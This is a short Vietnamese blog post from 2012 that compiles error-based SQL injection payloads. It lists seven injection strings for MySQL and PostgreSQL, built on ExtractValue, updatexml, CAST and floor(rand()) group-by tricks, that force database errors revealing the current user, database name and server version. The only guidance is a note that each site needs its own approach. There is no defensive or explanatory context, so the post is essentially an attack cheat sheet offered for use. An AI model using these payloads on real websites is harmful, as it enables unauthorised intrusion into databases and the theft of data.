Tổng hợp 1 số câu lệnh khai thác SQLI error base

Thứ Ba, 10 tháng 7, 2012 |
0

Mỗi site sẽ có cách khai thác khác nhau.Tuỳ cơ ứng biến nhé

===========================================================
+and 1=CAST(current_user||CHR(58)||current_database()|| CHR(58)||version()||CHR(58)||123 as int)
===========================================================
' and '1'=(select 1 AND ExtractValue(1,concat(0x5C,(user())))) and '1'='1
 ===========================================================
and updatexml(0,concat(0x3a,version()),0)-- -
 ===========================================================
 null and extractvalue(rand(),concat(0x3a,version(),0x3a,use r()))--
 ===========================================================
 (@:=1)||@ group by concat(version(),0x7c,database(),0x7c,user(),!@) having@||min(@:=0)
 ===========================================================
 /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select concat_ws(0x7c,version(),database(),user())),floor (rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/--
 ===========================================================
 +or+1+group+by+concat(0x7c,version(),floor(rand(0) *2))+having+min(0)+or+1--+

==========================THE END=================================

Tin mới cập nhật
Bài viết liên quan

Copyright 2011 - 2012 CLOVER NEWS
Nội dung trên được chúng tôi tổng hợp từ nhiều nguồn trên internet.
Thông tin mã nguồnCLOVER NEWS
Website sử dụng mã nguồn XML Blogger
Code XML by: Nguyễn Mạnh Đạt (DNMsuper)
Email: datnguyen1297@gmail.com
Y!M: dnmsuper

Liên hệ quảng cáo:
Email: datnguyen1297@gmail.com
Y!M: dnmsuper